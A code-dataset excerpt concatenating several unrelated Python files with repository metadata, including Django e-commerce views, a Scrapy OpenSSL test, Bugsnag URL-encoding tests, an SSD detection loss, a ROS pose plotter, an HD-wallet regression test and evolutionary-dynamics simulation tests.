mobile=request.COOKIES['mobile']
if 'address' in request.COOKIES:
address=request.COOKIES['address']
# here we are placing number of orders as much there is a products
# suppose if we have 5 items in cart and we place order....so 5 rows will be created in orders table
# there will be lot of redundant data in orders table...but its become more complicated if we normalize it
for product in products:
models.Orders.objects.get_or_create(customer=customer,product=product,status='Pending',email=email,mobile=mobile,address=address)
# after order placed cookies should be deleted
response = render(request,'ecom/payment_success.html')
response.delete_cookie('product_ids')
response.delete_cookie('email')
response.delete_cookie('mobile')
response.delete_cookie('address')
return response
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def my_order_view(request):
customer=models.Customer.objects.get(user_id=request.user.id)
orders=models.Orders.objects.all().filter(customer_id = customer)
ordered_products=[]
for order in orders:
ordered_product=models.Product.objects.all().filter(id=order.product.id)
ordered_products.append(ordered_product)
return render(request,'ecom/my_order.html',{'data':zip(ordered_products,orders)})
#--------------for discharge patient bill (pdf) download and printing
import io
from xhtml2pdf import pisa
from django.template.loader import get_template
from django.template import Context
from django.http import HttpResponse
def render_to_pdf(template_src, context_dict):
template = get_template(template_src)
html = template.render(context_dict)
result = io.BytesIO()
pdf = pisa.pisaDocument(io.BytesIO(html.encode("ISO-8859-1")), result)
if not pdf.err:
return HttpResponse(result.getvalue(), content_type='application/pdf')
return
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def download_invoice_view(request,orderID,productID):
order=models.Orders.objects.get(id=orderID)
product=models.Product.objects.get(id=productID)
mydict={
'orderDate':order.order_date,
'customerName':request.user,
'customerEmail':order.email,
'customerMobile':order.mobile,
'shipmentAddress':order.address,
'orderStatus':order.status,
'productName':product.name,
'productImage':product.product_image,
'productPrice':product.price,
'productDescription':product.description,
}
return render_to_pdf('ecom/download_invoice.html',mydict)
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def my_profile_view(request):
customer=models.Customer.objects.get(user_id=request.user.id)
return render(request,'ecom/my_profile.html',{'customer':customer})
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def edit_profile_view(request):
customer=models.Customer.objects.get(user_id=request.user.id)
user=models.User.objects.get(id=customer.user_id)
userForm=forms.CustomerUserForm(instance=user)
customerForm=forms.CustomerForm(request.FILES,instance=customer)
mydict={'userForm':userForm,'customerForm':customerForm}
if request.method=='POST':
userForm=forms.CustomerUserForm(request.POST,instance=user)
customerForm=forms.CustomerForm(request.POST,instance=customer)
if userForm.is_valid() and customerForm.is_valid():
user=userForm.save()
user.set_password(user.password)
user.save()
customerForm.save()
return HttpResponseRedirect('my-profile')
return render(request,'ecom/edit_profile.html',context=mydict)
#---------------------------------------------------------------------------------
#------------------------ ABOUT US AND CONTACT US VIEWS START --------------------
#---------------------------------------------------------------------------------
def aboutus_view(request):
return render(request,'ecom/aboutus.html')
def contactus_view(request):
sub = forms.ContactusForm()
if request.method == 'POST':
sub = forms.ContactusForm(request.POST)
if sub.is_valid():
email = sub.cleaned_data['Email']
name=sub.cleaned_data['Name']
message = sub.cleaned_data['Message']
send_mail(str(name)+' || '+str(email),message, settings.EMAIL_HOST_USER, settings.EMAIL_RECEIVING_USER, fail_silently = False)
return render(request, 'ecom/contactussuccess.html')
return render(request, 'ecom/contactus.html', {'form':sub})
| 39.127306
| 163
| 0.67888
|
794db0fe6fb178ab6e2d585276abe653e29bed3d
| 541
|
py
|
Python
|
scrapy/tests/test_dependencies.py
|
kamendula/scrapy
|
bd79b6e1d3e13344b98c268ac738d4b0ed9a1ce1
|
[
"BSD-3-Clause"
] | 1
|
2015-04-23T15:02:58.000Z
|
2015-04-23T15:02:58.000Z
|
scrapy/tests/test_dependencies.py
|
KDOTGIS/scrapy
|
fa245af6d24c9bf87b00419b7ffb6a483baba199
|
[
"BSD-3-Clause"
] | null | null | null |
scrapy/tests/test_dependencies.py
|
KDOTGIS/scrapy
|
fa245af6d24c9bf87b00419b7ffb6a483baba199
|
[
"BSD-3-Clause"
] | null | null | null |
from twisted.trial import unittest
class ScrapyUtilsTest(unittest.TestCase):
def test_required_openssl_version(self):
try:
module = __import__('OpenSSL', {}, {}, [''])
except ImportError as ex:
raise unittest.SkipTest("OpenSSL is not available")
if hasattr(module, '__version__'):
installed_version = [int(x) for x in module.__version__.split('.')[:2]]
assert installed_version >= [0, 6], "OpenSSL >= 0.6 required"
if __name__ == "__main__":
unittest.main()
| 33.8125
| 83
| 0.626617
|
794db15560c8ef600c23007274a1ef06f3eff191
| 3,172
|
py
|
Python
|
statey/hooks.py
|
cfeenstra67/statey
|
6d127ed48265e2e072fbb26486458a4b28a333ec
|
[
"MIT"
] | 4
|
2021-02-16T19:34:38.000Z
|
2022-01-31T16:44:14.000Z
|
statey/hooks.py
|
cfeenstra67/statey
|
6d127ed48265e2e072fbb26486458a4b28a333ec
|
[
"MIT"
] | null | null | null |
statey/hooks.py
|
cfeenstra67/statey
|
6d127ed48265e2e072fbb26486458a4b28a333ec
|
[
"MIT"
] | null | null | null |
from typing import Optional
import pluggy
from statey import NS
hookspec = pluggy.HookspecMarker(NS)
hookimpl = pluggy.HookimplMarker(NS)
def create_plugin_manager() -> pluggy.PluginManager:
"""
Factory function to create a plugin manager w/ the default namespace
"""
return pluggy.PluginManager(NS)
def register_default_plugins(
registry: Optional["Registry"] = None,
encoders: bool = True,
type_plugins: bool = True,
semantics: bool = True,
type_serializers: bool = True,
providers: bool = True,
extensions: bool = True,
differs: bool = True,
methods: bool = True,
casters: bool = True,
impl_serializers: bool = True,
object_serializers: bool = True,
namespace_serializers: bool = True,
session_serializers: bool = True,
state_managers: bool = True,
setuptools_entrypoints: bool = True,
) -> None:
"""
Convenience method to register all of the default provided hooks for the given
object types
"""
if registry is None:
from statey import registry
if encoders:
from statey.syms.encoders import register as register_encoders
register_encoders(registry)
if type_plugins:
from statey.syms.plugins import register as register_type_plugins
register_type_plugins(registry)
if semantics:
from statey.syms.semantics import register as register_semantics
register_semantics(registry)
if type_serializers:
from statey.syms.type_serializers import register as register_serializers
register_serializers(registry)
if differs:
from statey.syms.diff import register as register_differs
register_differs(registry)
if casters:
from statey.syms.casters import register as register_casters
register_casters(registry)
if methods:
from statey.syms.methods import register as register_methods
register_methods(registry)
if impl_serializers:
from statey.syms.impl_serializers import register as register_impl_serializers
register_impl_serializers(registry)
if object_serializers:
from statey.syms.object_serializers import (
register as register_object_serializers,
)
register_object_serializers(registry)
if namespace_serializers:
from statey.syms.namespace_serializers import (
register as register_ns_serializers,
)
register_ns_serializers(registry)
if session_serializers:
from statey.syms.session_serializers import (
register as register_session_serializers,
)
register_session_serializers(registry)
if providers:
from statey.provider import register as register_providers
register_providers(registry)
if extensions:
from statey.ext import register as register_extensions
register_extensions(registry)
if state_managers:
from statey.state_manager import register as register_state_managers
register_state_managers(registry)
if setuptools_entrypoints:
registry.load_setuptools_entrypoints()
| 25.788618
| 86
| 0.70681
|
794db2220704cf1bbb75a99b3efef99da6b82704
| 3,247
|
py
|
Python
|
tests/test_path_encoding.py
|
ForroKulcs/bugsnag-python
|
107c1add31a2202cc08ef944aa00ab96996b247a
|
[
"MIT"
] | 76
|
2015-03-01T11:46:57.000Z
|
2022-02-18T10:57:44.000Z
|
tests/test_path_encoding.py
|
ForroKulcs/bugsnag-python
|
107c1add31a2202cc08ef944aa00ab96996b247a
|
[
"MIT"
] | 119
|
2015-01-14T11:53:08.000Z
|
2022-03-30T08:22:50.000Z
|
tests/test_path_encoding.py
|
ForroKulcs/bugsnag-python
|
107c1add31a2202cc08ef944aa00ab96996b247a
|
[
"MIT"
] | 46
|
2015-02-09T23:50:57.000Z
|
2022-01-06T16:04:40.000Z
|
# coding=utf-8
import unittest
from urllib.parse import quote
from bugsnag.event import Event
from bugsnag.configuration import (Configuration, RequestConfiguration)
class PathEncodingTest(unittest.TestCase):
environ = {
'SCRIPT_NAME': '',
'SERVER_NAME': 'localhost',
'SERVER_PORT': '80',
'wsgi.url_scheme': 'http',
}
def test_path_supports_ascii_characters(self):
import bugsnag.wsgi.middleware
environ = self.environ.copy()
environ['PATH_INFO'] = '/hello/world'
bugsnag.configure_request(wsgi_environ=environ)
config = Configuration()
event = Event(
Exception("oops"),
config,
RequestConfiguration.get_instance()
)
bugsnag.wsgi.middleware.add_wsgi_request_data_to_notification(
event
)
self.assertEqual(
'http://localhost/hello/world',
event.metadata['request']['url']
)
def test_wrongly_encoded_url_should_not_raise(self):
import bugsnag.wsgi.middleware
environ = self.environ.copy()
environ['PATH_INFO'] = '/%83'
bugsnag.configure_request(wsgi_environ=environ)
config = Configuration()
event = Event(
Exception("oops"),
config,
RequestConfiguration.get_instance()
)
bugsnag.wsgi.middleware.add_wsgi_request_data_to_notification(
event
)
# We have to use "urllib.parse.quote" here because the exact output
# differs on different Python versions because of how they handle
# invalid encoding sequences
self.assertEqual(
'http://localhost/%s' % quote('%83'),
event.metadata['request']['url']
)
def test_path_supports_emoji(self):
import bugsnag.wsgi.middleware
environ = self.environ.copy()
environ['PATH_INFO'] = '/😇'
config = Configuration()
event = Event(
Exception("oops"),
config,
RequestConfiguration.get_instance()
)
bugsnag.configure_request(wsgi_environ=environ)
bugsnag.wsgi.middleware.add_wsgi_request_data_to_notification(
event
)
# You can validate this by using "encodeURIComponent" in a browser.
self.assertEqual(
'http://localhost/%F0%9F%98%87',
event.metadata['request']['url']
)
def test_path_supports_non_ascii_characters(self):
import bugsnag.wsgi.middleware
environ = self.environ.copy()
environ['PATH_INFO'] = '/ôßłガ'
config = Configuration()
event = Event(
Exception("oops"),
config,
RequestConfiguration.get_instance()
)
bugsnag.configure_request(wsgi_environ=environ)
bugsnag.wsgi.middleware.add_wsgi_request_data_to_notification(
event
)
# You can validate this by using "encodeURIComponent" in a browser.
self.assertEqual(
'http://localhost/%C3%B4%C3%9F%C5%82%E3%82%AC',
event.metadata['request']['url']
)
if __name__ == '__main__':
unittest.main()
| 26.614754
| 75
| 0.59963
|
794db42d2be0a8f9178bec865ee17b1007677673
| 288
|
py
|
Python
|
fdk_client/platform/models/StatsImported.py
|
kavish-d/fdk-client-python
|
a1023eb530473322cb52e095fc4ceb226c1e6037
|
[
"MIT"
] | null | null | null |
fdk_client/platform/models/StatsImported.py
|
kavish-d/fdk-client-python
|
a1023eb530473322cb52e095fc4ceb226c1e6037
|
[
"MIT"
] | null | null | null |
fdk_client/platform/models/StatsImported.py
|
kavish-d/fdk-client-python
|
a1023eb530473322cb52e095fc4ceb226c1e6037
|
[
"MIT"
] | null | null | null |
"""Platform Models."""
from marshmallow import fields, Schema
from marshmallow.validate import OneOf
from ..enums import *
from ..models.BaseSchema import BaseSchema
class StatsImported(BaseSchema):
# Communication swagger.json
count = fields.Int(required=False)
| 16
| 42
| 0.732639
|
794db431c93c8398f9e9d36a557953856b80c14c
| 4,952
|
py
|
Python
|
layers/modules/multibox_loss.py
|
chosj95/SSD-Zoomed
|
0e8fd9829406e6b903c974733cb6976b8e0fd968
|
[
"MIT"
] | null | null | null |
layers/modules/multibox_loss.py
|
chosj95/SSD-Zoomed
|
0e8fd9829406e6b903c974733cb6976b8e0fd968
|
[
"MIT"
] | null | null | null |
layers/modules/multibox_loss.py
|
chosj95/SSD-Zoomed
|
0e8fd9829406e6b903c974733cb6976b8e0fd968
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from data import coco as cfg
from ..box_utils import match, log_sum_exp
class MultiBoxLoss(nn.Module):
"""SSD Weighted Loss Function
Compute Targets:
1) Produce Confidence Target Indices by matching ground truth boxes
with (default) 'priorboxes' that have jaccard index > threshold parameter
(default threshold: 0.5).
2) Produce localization target by 'encoding' variance into offsets of ground
truth boxes and their matched 'priorboxes'.
3) Hard negative mining to filter the excessive number of negative examples
that comes with using a large number of default bounding boxes.
(default negative:positive ratio 3:1)
Objective Loss:
L(x,c,l,g) = (Lconf(x, c) + αLloc(x,l,g)) / N
Where, Lconf is the CrossEntropy Loss and Lloc is the SmoothL1 Loss
weighted by α which is set to 1 by cross val.
Args:
c: class confidences,
l: predicted boxes,
g: ground truth boxes
N: number of matched default boxes
See: https://arxiv.org/pdf/1512.02325.pdf for more details.
"""
def __init__(self, num_classes, overlap_thresh, prior_for_matching,
bkg_label, neg_mining, neg_pos, neg_overlap, encode_target,
use_gpu=True):
super(MultiBoxLoss, self).__init__()
self.use_gpu = use_gpu
self.num_classes = num_classes
self.threshold = overlap_thresh
self.background_label = bkg_label
self.encode_target = encode_target
self.use_prior_for_matching = prior_for_matching
self.do_neg_mining = neg_mining
self.negpos_ratio = neg_pos
self.neg_overlap = neg_overlap
self.variance = cfg['variance']
def forward(self, predictions, targets):
"""Multibox Loss
Args:
predictions (tuple): A tuple containing loc preds, conf preds,
and prior boxes from SSD net.
conf shape: torch.size(batch_size,num_priors,num_classes)
loc shape: torch.size(batch_size,num_priors,4)
priors shape: torch.size(num_priors,4)
targets (tensor): Ground truth boxes and labels for a batch,
shape: [batch_size,num_objs,5] (last idx is the label).
"""
loc_data, conf_data, priors = predictions
num = loc_data.size(0)
priors = priors[:loc_data.size(1), :]
num_priors = (priors.size(0))
num_classes = self.num_classes
# match priors (default boxes) and ground truth boxes
loc_t = torch.Tensor(num, num_priors, 4)
conf_t = torch.LongTensor(num, num_priors)
for idx in range(num):
truths = targets[idx][:, :-1].data
labels = targets[idx][:, -1].data
defaults = priors.data
match(self.threshold, truths, defaults, self.variance, labels,
loc_t, conf_t, idx)
if self.use_gpu:
loc_t = loc_t.cuda()
conf_t = conf_t.cuda()
# wrap targets
loc_t = Variable(loc_t, requires_grad=False)
conf_t = Variable(conf_t, requires_grad=False)
pos = conf_t > 0
num_pos = pos.sum(dim=1, keepdim=True)
# Localization Loss (Smooth L1)
# Shape: [batch,num_priors,4]
pos_idx = pos.unsqueeze(pos.dim()).expand_as(loc_data)
loc_p = loc_data[pos_idx].view(-1, 4)
loc_t = loc_t[pos_idx].view(-1, 4)
loss_l = F.smooth_l1_loss(loc_p, loc_t, size_average=False)
# Compute max conf across batch for hard negative mining
batch_conf = conf_data.view(-1, self.num_classes)
loss_c = log_sum_exp(batch_conf) - batch_conf.gather(1, conf_t.view(-1, 1))
# Hard Negative Mining
loss_c[pos.view(-1,1)] = 0 # filter out pos boxes for now
loss_c = loss_c.view(num, -1)
_, loss_idx = loss_c.sort(1, descending=True)
_, idx_rank = loss_idx.sort(1)
num_pos = pos.long().sum(1, keepdim=True)
num_neg = torch.clamp(self.negpos_ratio*num_pos, max=pos.size(1)-1)
neg = idx_rank < num_neg.expand_as(idx_rank)
# Confidence Loss Including Positive and Negative Examples
pos_idx = pos.unsqueeze(2).expand_as(conf_data)
neg_idx = neg.unsqueeze(2).expand_as(conf_data)
conf_p = conf_data[(pos_idx+neg_idx).gt(0)].view(-1, self.num_classes)
targets_weighted = conf_t[(pos+neg).gt(0)]
loss_c = F.cross_entropy(conf_p, targets_weighted, size_average=False)
# Sum of losses: L(x,c,l,g) = (Lconf(x, c) + αLloc(x,l,g)) / N
N = num_pos.data.sum().double()
loss_l = loss_l.double()
loss_c = loss_c.double()
loss_l /= N
loss_c /= N
return loss_l, loss_c
| 41.266667
| 84
| 0.622981
|
794db481e4ec975914252f90d9e72d526bdbfa44
| 4,524
|
py
|
Python
|
mobile_bot/mobile_bot_ekf/scripts/plot_pose.py
|
benmo009/ros-simulations
|
dc25f285a06658f88a9852e349bffe9b4b505484
|
[
"MIT"
] | null | null | null |
mobile_bot/mobile_bot_ekf/scripts/plot_pose.py
|
benmo009/ros-simulations
|
dc25f285a06658f88a9852e349bffe9b4b505484
|
[
"MIT"
] | null | null | null |
mobile_bot/mobile_bot_ekf/scripts/plot_pose.py
|
benmo009/ros-simulations
|
dc25f285a06658f88a9852e349bffe9b4b505484
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import rospy
import numpy as np
import matplotlib.pyplot as plt
from gazebo_msgs.srv import GetModelState
from geometry_msgs.msg import Pose
from tf.transformations import euler_from_quaternion
class PosePlotter:
def __init__(self, name):
# Initialize ROS node
rospy.init_node(name)
# Subscribe to gps topics
self.noisy_sub = rospy.Subscriber("/gps/noisy", Pose, self.noisy_gps_callback, queue_size=1)
self.true_sub = rospy.Subscriber("/gps/true", Pose, self.true_gps_callback, queue_size=1)
self.odom_sub = rospy.Subscriber("/mobile_bot/dead_reckoning", Pose, self.odom_callback, queue_size=1)
self.odom_sub = rospy.Subscriber("/mobile_bot/range_sensor", Pose, self.range_callback, queue_size=1)
# Initialize dictionaries for storing gps data
self.noisy_data = {"t": [], "x": [], "y": [], "theta": []}
self.true_data = {"t": [], "x": [], "y": [], "theta": []}
self.odom_data = {"t": [], "x": [], "y": [], "theta": []}
self.range_data = {"t": [], "x": [], "y": [], "theta": []}
# Callback function for noisy GPS data
def noisy_gps_callback(self, data):
# Store the time, x, and y positions
self.noisy_data["t"].append(rospy.get_time())
self.noisy_data["x"].append(data.position.x)
self.noisy_data["y"].append(data.position.y)
# Convert quaternion data to euler angles to get orientation
q = data.orientation
theta = euler_from_quaternion([q.x, q.y, q.z, q.w])
theta = theta[2]
self.noisy_data["theta"].append(theta)
# Callback function for true GPS data
def true_gps_callback(self, data):
# Store the time, x, and y positions
self.true_data["t"].append(rospy.get_time())
self.true_data["x"].append(data.position.x)
self.true_data["y"].append(data.position.y)
# Convert quaternion data to euler angles to get orientation
q = data.orientation
theta = euler_from_quaternion([q.x, q.y, q.z, q.w])
theta = theta[2]
self.true_data["theta"].append(theta)
def odom_callback(self, data):
self.odom_data["t"].append(rospy.get_time())
self.odom_data["x"].append(data.position.x)
self.odom_data["y"].append(data.position.y)
self.odom_data["theta"].append(data.orientation.x)
def range_callback(self, data):
self.range_data["t"].append(rospy.get_time())
self.range_data["x"].append(data.position.x)
self.range_data["y"].append(data.position.y)
self.range_data["theta"].append(data.orientation.x)
# Plot the GPS data
def plot(self):
fig, ax = plt.subplots(3,1)
ax[0].plot(self.true_data["t"], self.true_data["x"], label="True x")
ax[1].plot(self.true_data["t"], self.true_data["y"], label="True y")
ax[2].plot(self.true_data["t"], self.true_data["theta"], label="True $\\theta$")
# ax[0].plot(self.noisy_data["t"], self.noisy_data["x"], '--', label="Noisy x")
# ax[1].plot(self.noisy_data["t"], self.noisy_data["y"], '--', label="Noisy y")
# ax[2].plot(self.noisy_data["t"], self.noisy_data["theta"], '--', label="Noisy $\\theta$")
ax[0].plot(self.odom_data["t"], self.odom_data["x"], '--', label="Odom x")
ax[1].plot(self.odom_data["t"], self.odom_data["y"], '--', label="Odom y")
ax[2].plot(self.odom_data["t"], self.odom_data["theta"], '--', label="Odom $\\theta$")
ax[0].plot(self.range_data["t"], self.range_data["x"], '--', label="Range x")
ax[1].plot(self.range_data["t"], self.range_data["y"], '--', label="Range y")
ax[2].plot(self.range_data["t"], self.range_data["theta"], '--', label="Range $\\theta$")
for i in range(3):
ax[i].legend()
ax[i].set_xlabel("Time (s)")
ax[i].set_ylabel("Position")
plt.tight_layout()
plt.show()
if __name__ == "__main__":
try:
# Get sampling time from parameter server
if rospy.has_param("mobile_bot/plotter/sample_time"):
sample_time = rospy.get_param("mobile_bot/plotter/sample_time")
else:
sample_time = 30
# Start plotter node
plotter = PosePlotter("mobile_bot_pose_plotter")
# Define how long to collect data for.
rospy.sleep(sample_time)
# Plot the GPS data
plotter.plot()
except rospy.ROSInterruptException:
pass
| 40.756757
| 110
| 0.60588
|
794db5131ed61b290e05385c82f6b7e55acd7da8
| 4,992
|
py
|
Python
|
qa/rpc-tests/wallet-hd.py
|
fg12347/smc
|
15cac6c49e27c055d4f217ec31ad9923691051fe
|
[
"MIT"
] | null | null | null |
qa/rpc-tests/wallet-hd.py
|
fg12347/smc
|
15cac6c49e27c055d4f217ec31ad9923691051fe
|
[
"MIT"
] | null | null | null |
qa/rpc-tests/wallet-hd.py
|
fg12347/smc
|
15cac6c49e27c055d4f217ec31ad9923691051fe
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2
# coding=utf-8
# ^^^^^^^^^^^^ TODO remove when supporting only Python3
# Copyright (c) 2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test Hierarchical Deterministic wallet function."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
class WalletHDTest(BitcoinTestFramework):
def setup_chain(self):
print("Initializing test directory "+self.options.tmpdir)
initialize_chain_clean(self.options.tmpdir, 2)
def setup_network(self):
self.nodes = start_nodes(2, self.options.tmpdir, [['-usehd=0'], ['-usehd=1', '-keypool=0']])
self.is_network_split = False
connect_nodes_bi(self.nodes, 0, 1)
self.is_network_split=False
self.sync_all()
def run_test (self):
tmpdir = self.options.tmpdir
# Make sure can't switch off usehd after wallet creation
stop_node(self.nodes[1],1)
try:
start_node(1, self.options.tmpdir, ['-usehd=0'])
raise AssertionError("Must not allow to turn off HD on an already existing HD wallet")
except Exception as e:
assert("smcd exited with status 1 during initialization" in str(e))
# assert_start_raises_init_error(1, self.options.tmpdir, ['-usehd=0'], 'already existing HD wallet')
# self.nodes[1] = start_node(1, self.options.tmpdir, self.node_args[1])
self.nodes[1] = start_node(1, self.options.tmpdir, ['-usehd=1', '-keypool=0'])
connect_nodes_bi(self.nodes, 0, 1)
# Make sure we use hd, keep chainid
chainid = self.nodes[1].getwalletinfo()['hdchainid']
assert_equal(len(chainid), 64)
# create an internal key
change_addr = self.nodes[1].getrawchangeaddress()
change_addrV= self.nodes[1].validateaddress(change_addr);
assert_equal(change_addrV["hdkeypath"], "m/44'/1'/0'/1/0") #first internal child key
# Import a non-HD private key in the HD wallet
non_hd_add = self.nodes[0].getnewaddress()
self.nodes[1].importprivkey(self.nodes[0].dumpprivkey(non_hd_add))
# This should be enough to keep the master key and the non-HD key
self.nodes[1].backupwallet(tmpdir + "/hd.bak")
#self.nodes[1].dumpwallet(tmpdir + "/hd.dump")
# Derive some HD addresses and remember the last
# Also send funds to each add
self.nodes[0].generate(101)
hd_add = None
num_hd_adds = 300
for i in range(num_hd_adds):
hd_add = self.nodes[1].getnewaddress()
hd_info = self.nodes[1].validateaddress(hd_add)
assert_equal(hd_info["hdkeypath"], "m/44'/1'/0'/0/"+str(i+1))
assert_equal(hd_info["hdchainid"], chainid)
self.nodes[0].sendtoaddress(hd_add, 1)
self.nodes[0].generate(1)
self.nodes[0].sendtoaddress(non_hd_add, 1)
self.nodes[0].generate(1)
# create an internal key (again)
change_addr = self.nodes[1].getrawchangeaddress()
change_addrV= self.nodes[1].validateaddress(change_addr);
assert_equal(change_addrV["hdkeypath"], "m/44'/1'/0'/1/1") #second internal child key
self.sync_all()
assert_equal(self.nodes[1].getbalance(), num_hd_adds + 1)
print("Restore backup ...")
stop_node(self.nodes[1],1)
os.remove(self.options.tmpdir + "/node1/regtest/wallet.dat")
shutil.copyfile(tmpdir + "/hd.bak", tmpdir + "/node1/regtest/wallet.dat")
self.nodes[1] = start_node(1, self.options.tmpdir, ['-usehd=1', '-keypool=0'])
#connect_nodes_bi(self.nodes, 0, 1)
# Assert that derivation is deterministic
hd_add_2 = None
for _ in range(num_hd_adds):
hd_add_2 = self.nodes[1].getnewaddress()
hd_info_2 = self.nodes[1].validateaddress(hd_add_2)
assert_equal(hd_info_2["hdkeypath"], "m/44'/1'/0'/0/"+str(_+1))
assert_equal(hd_info_2["hdchainid"], chainid)
assert_equal(hd_add, hd_add_2)
# Needs rescan
stop_node(self.nodes[1],1)
self.nodes[1] = start_node(1, self.options.tmpdir, ['-usehd=1', '-keypool=0', '-rescan'])
#connect_nodes_bi(self.nodes, 0, 1)
assert_equal(self.nodes[1].getbalance(), num_hd_adds + 1)
# send a tx and make sure its using the internal chain for the changeoutput
txid = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1)
outs = self.nodes[1].decoderawtransaction(self.nodes[1].gettransaction(txid)['hex'])['vout'];
keypath = ""
for out in outs:
if out['value'] != 1:
keypath = self.nodes[1].validateaddress(out['scriptPubKey']['addresses'][0])['hdkeypath']
assert_equal(keypath[0:13], "m/44'/1'/0'/1")
if __name__ == '__main__':
WalletHDTest().main ()
| 43.789474
| 108
| 0.638622
|
794db58b3c91bef74d65b5b1679ba23b8072e828
| 598
|
py
|
Python
|
distributed/protocol/tests/test_numba.py
|
gforsyth/distributed
|
6fe62774aa7ad585cf2231ca6475f70fdc1cec24
|
[
"BSD-3-Clause"
] | null | null | null |
distributed/protocol/tests/test_numba.py
|
gforsyth/distributed
|
6fe62774aa7ad585cf2231ca6475f70fdc1cec24
|
[
"BSD-3-Clause"
] | null | null | null |
distributed/protocol/tests/test_numba.py
|
gforsyth/distributed
|
6fe62774aa7ad585cf2231ca6475f70fdc1cec24
|
[
"BSD-3-Clause"
] | null | null | null |
from distributed.protocol import serialize, deserialize
import pytest
cuda = pytest.importorskip("numba.cuda")
np = pytest.importorskip("numpy")
@pytest.mark.parametrize("dtype", ["u1", "u4", "u8", "f4"])
def test_serialize_cupy(dtype):
ary = np.arange(100, dtype=dtype)
x = cuda.to_device(ary)
header, frames = serialize(x, serializers=("cuda", "dask", "pickle"))
y = deserialize(header, frames, deserializers=("cuda", "dask", "pickle", "error"))
hx = np.empty_like(ary)
hy = np.empty_like(ary)
x.copy_to_host(hx)
y.copy_to_host(hy)
assert (hx == hy).all()
| 29.9
| 86
| 0.667224
|
794db66e44edd6cf54aee6795ef3619dd22e5e94
| 6,973
|
py
|
Python
|
PyEvoDyn/pyevodyn/tests/moran_process_simulation_test.py
|
juliangarcia/pyevodyn
|
79091f0a50e1dd834b8697e3158dfe75acd2efc1
|
[
"BSD-2-Clause-FreeBSD"
] | 1
|
2020-09-22T07:10:49.000Z
|
2020-09-22T07:10:49.000Z
|
PyEvoDyn/pyevodyn/tests/moran_process_simulation_test.py
|
juliangarcia/pyevodyn
|
79091f0a50e1dd834b8697e3158dfe75acd2efc1
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
PyEvoDyn/pyevodyn/tests/moran_process_simulation_test.py
|
juliangarcia/pyevodyn
|
79091f0a50e1dd834b8697e3158dfe75acd2efc1
|
[
"BSD-2-Clause-FreeBSD"
] | 4
|
2016-12-20T03:05:42.000Z
|
2021-01-01T09:01:45.000Z
|
'''
Created on Oct 3, 2012
@author: garcia
'''
import unittest
from pyevodyn import games
import numpy as np
from pyevodyn.simulation import MoranProcess
import pyevodyn.simulation as sim
class Test(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def mock_up_payoff_function_everybody_gets_one(self, population_array):
return np.ones(len(population_array))
def test_custom_fitnes(self):
mp = sim.MoranProcess(population_size=10, intensity_of_selection=0.001,
game_matrix=None, payoff_function=self.mock_up_payoff_function_everybody_gets_one,
number_of_strategies=5,
fitness_mapping='lin', mutation_probability=0.001)
pop = np.array([1, 2, 3, 4, 5])
np.testing.assert_array_equal(mp.payoff_function(pop), np.ones(len(pop)), "Custom function payoff failed")
def test_game_fitness(self):
mp = sim.MoranProcess(population_size=10, intensity_of_selection=0.001,
game_matrix=games.neutral_game(2), payoff_function=None, number_of_strategies=2,
fitness_mapping='lin', mutation_probability=0.001)
pop = np.array([5, 5])
np.testing.assert_array_equal(mp.payoff_function(pop), np.ones(len(pop)),
"Neutral game test function payoff failed")
mp = sim.MoranProcess(population_size=10, intensity_of_selection=0.001,
game_matrix=np.zeros(shape=(2, 2)), payoff_function=None, number_of_strategies=2,
fitness_mapping='lin', mutation_probability=0.001)
pop = np.array([5, 5])
np.testing.assert_array_equal(mp.payoff_function(pop), np.zeros(len(pop)),
"Neutral game test function payoff failed")
def test_step_invariable_in_population_size(self):
for _ in range(0, 3):
# random game 2x2, random mutation rate, random intensity
mp = sim.MoranProcess(population_size=10, intensity_of_selection=np.random.rand(),
game_matrix=np.random.rand(2, 2), number_of_strategies=2,
fitness_mapping='exp', mutation_probability=np.random.rand())
str1 = np.random.randint(0, 10)
pop = [str1, 10 - str1]
for __ in range(0, 20):
pop = mp.step(pop, mutation_step=np.random.randint(0, 2))[0]
# print pop
self.assertEqual(sum(pop), 10, "Pop size should always be ten!")
def test_initialization(self):
try:
sim.MoranProcess(population_size=10, intensity_of_selection=0.05,
game_matrix=None, payoff_function=None,
number_of_strategies=None, fitness_mapping='exp', mutation_probability=0.001,
mutation_kernel=None)
except ValueError as err:
print('Error {} tested OK.'.format(err))
self.assertTrue(True, 'No exception raised!')
try:
sim.MoranProcess(population_size=10, intensity_of_selection=0.05,
game_matrix=None, payoff_function=self.mock_up_payoff_function_everybody_gets_one,
number_of_strategies=None, fitness_mapping='exp', mutation_probability=None,
mutation_kernel=None)
except ValueError as err:
print('Error {} tested OK.'.format(err))
self.assertTrue(True, 'No exception raised!')
try:
sim.MoranProcess(population_size=10, intensity_of_selection=0.05,
game_matrix=np.ones(5), payoff_function=None,
number_of_strategies=None, fitness_mapping='exp', mutation_probability=0.01,
mutation_kernel=None)
except ValueError as err:
print('Error {} tested OK.'.format(err))
self.assertTrue(True, 'No exception raised!')
try:
sim.MoranProcess(population_size=10, intensity_of_selection=0.05,
game_matrix=None, payoff_function=self.mock_up_payoff_function_everybody_gets_one,
number_of_strategies=None, fitness_mapping='exp', mutation_probability=0.01,
mutation_kernel=None)
except ValueError as err:
print('Error {} tested OK.'.format(err))
self.assertTrue(True, 'No exception raised!')
try:
sim.MoranProcess(population_size=10, intensity_of_selection=0.05,
game_matrix=None, payoff_function=self.mock_up_payoff_function_everybody_gets_one,
number_of_strategies=5, fitness_mapping='hola', mutation_probability=0.01,
mutation_kernel=None)
except ValueError as err:
print('Error {} tested OK.'.format(err))
self.assertTrue(True, 'No exception raised!')
return
self.assertTrue(False, 'No exception raised')
def test_if_a_type_is_not_there_it_never_shows_up(self):
# np.random.seed(999)
